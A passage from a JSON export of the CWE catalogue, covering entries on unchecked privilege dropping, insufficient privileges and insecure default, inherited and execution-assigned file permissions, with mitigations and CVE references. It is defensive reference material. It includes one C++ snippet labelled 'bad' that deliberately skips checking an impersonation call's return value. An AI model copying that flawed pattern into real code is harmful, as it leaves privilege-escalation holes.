management."]}}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"If privileges are not dropped, neither are access rights of the user. Often these rights can be prevented from being dropped."},{"Scope":["Access Control","Non-Repudiation"],"Impact":["Gain Privileges or Assume Identity","Hide Activities"],"Note":"If privileges are not dropped, in some cases the system may record actions as the user which is being impersonated rather than the impersonator."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"attr":{"@_Mitigation_ID":"MIT-53"},"Phase":"Implementation","Description":"Check the results of all functions that return a value and verify that the value is expected.","Effectiveness":"High","Effectiveness_Notes":"Checking the return value of the function will typically be sufficient, however beware of race conditions (CWE-362) in a concurrent environment."},{"Phase":"Implementation","Description":"In Windows, make sure that the process token has the SeImpersonatePrivilege(Microsoft Server 2003). Code that relies on impersonation for security must ensure that the impersonation succeeded, i.e., that a proper privilege demotion happened."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code attempts to take on the privileges of a user before creating a file, thus avoiding performing the action with unnecessarily high privileges:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"bool DoSecureStuff(HANDLE hPipe) {}","xhtml:div":{"#text":"bool fDataWritten = false;ImpersonateNamedPipeClient(hPipe);HANDLE hFile = CreateFile(...);/../RevertToSelf()/../","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}},"Body_Text":"The call to ImpersonateNamedPipeClient may fail, but the return value is not checked. If the call fails, the code may execute with higher privileges than intended. In this case, an attacker could exploit this behavior to write a file to a location that the attacker does not have access to."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-4447","Description":"Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4447"},{"Reference":"CVE-2006-2916","Description":"Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2916"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to check whether privileges were dropped successfully"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS37-C","Entry_Name":"Ensure that privilege relinquishment is successful","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Modes_of_Introduction, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Background_Details, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Failure to Check Whether Privileges Were Dropped Successfully","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Check for Successfully Dropped Privileges","attr":{"@_Date":"2009-05-27"}}]}},"274":{"attr":{"@_ID":"274","@_Name":"Improper Handling of Insufficient Privileges","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when it has insufficient privileges to perform an operation, leading to resultant weaknesses.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"271","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"280","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Other","Alter Execution Logic"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1564","Description":"System limits are not properly enforced after privileges are dropped.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1564"},{"Reference":"CVE-2005-3286","Description":"Firewall crashes when it can\'t read a critical memory block that was protected by a malicious process.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3286"},{"Reference":"CVE-2005-1641","Description":"Does not give admin sufficient privileges to overcome otherwise legitimate user actions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1641"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insufficient privileges"}},"Notes":{"Note":[{"#text":"CWE-280 and CWE-274 are too similar. It is likely that CWE-274 will be deprecated in the future.","attr":{"@_Type":"Maintenance"}},{"#text":"Overlaps dropped privileges, insufficient permissions.","attr":{"@_Type":"Relationship"}},{"#text":"This has a layering relationship with Unchecked Error Condition and Unchecked Return Value.","attr":{"@_Type":"Theoretical"}},{"#text":"Within the context of vulnerability theory, privileges and permissions are two sides of the same coin. Privileges are associated with actors, and permissions are associated with resources. To perform access control, at some point the software makes a decision about whether the actor (and the privileges that have been assigned to that actor) is allowed to access the resource (based on the permissions that have been specified for that resource).","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Maintenance_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationship_Notes, Theoretical_Notes"}],"Previous_Entry_Name":[{"#text":"Insufficient Privileges","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Insufficient Privileges","attr":{"@_Date":"2009-05-27"}}]}},"276":{"attr":{"@_ID":"276","@_Name":"Incorrect Default Permissions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"During installation, installed file permissions are set to allow anyone to modify those files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Installation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inter-application Flow Analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria","Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Host Application Interface Scanner"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer","Automated Monitored Execution","Forced Path Execution"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"The architecture needs to access and modification attributes for files to only those users who actually require those actions."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1941","Description":"Executables installed world-writable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1941"},{"Reference":"CVE-2002-1713","Description":"Home directories installed world-readable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1713"},{"Reference":"CVE-2001-1550","Description":"World-writable log files allow information loss; world-readable file has cleartext passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1550"},{"Reference":"CVE-2002-1711","Description":"World-readable directory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1711"},{"Reference":"CVE-2002-1844","Description":"Windows product uses insecure permissions when installing on Solaris (genesis: port error).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1844"},{"Reference":"CVE-2001-0497","Description":"Insecure permissions for a shared secret key file. Overlaps cryptographic problem.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0497"},{"Reference":"CVE-1999-0426","Description":"Default permissions of a device allow IP spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0426"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insecure Default Permissions"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO06-C","Entry_Name":"Create files with appropriate access permissions"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO01-J","Entry_Name":"Create files with appropriate access permission"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"127"}},{"attr":{"@_CAPEC_ID":"81"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, &#34;Insecure Defaults&#34;, Page 69"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Description, Modes_of_Introduction, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Insecure Default Permissions","attr":{"@_Date":"2009-05-27"}}}},"277":{"attr":{"@_ID":"277","@_Name":"Insecure Inherited Permissions","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A product defines a set of insecure permissions that are inherited by objects that are created by the program.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1841","Description":"User\'s umask is used when creating temp files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1841"},{"Reference":"CVE-2002-1786","Description":"Insecure umask for core dumps [is the umask preserved or assigned?].","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1786"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insecure inherited permissions"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}]}},"278":{"attr":{"@_ID":"278","@_Name":"Insecure Preserved Inherited Permissions","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A product inherits a set of insecure permissions for an object, e.g. when copying from an archive file, without user awareness or involvement.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-1724","Description":"Does not obey specified permissions when exporting.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1724"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insecure preserved inherited permissions"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}]}},"279":{"attr":{"@_ID":"279","@_Name":"Incorrect Execution-Assigned Permissions","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"While it is executing, the software sets the permissions of an object in a way that violates the intended permissions that have been specified by the user.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Architecture and Design"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0265","Description":"Log files opened read/write.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0265"},{"Reference":"CVE-2003-0876","Description":"Log files opened read/write.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0876"},{"Reference":"CVE-2002-1694","Description":"Log files opened read/write.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1694"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insecure execution-assigned permissions"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO06-C","Entry_Name":"Create files with appropriate access permissions"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO01-J","Entry_Name":"Create files with appropriate access permission"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"81"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, 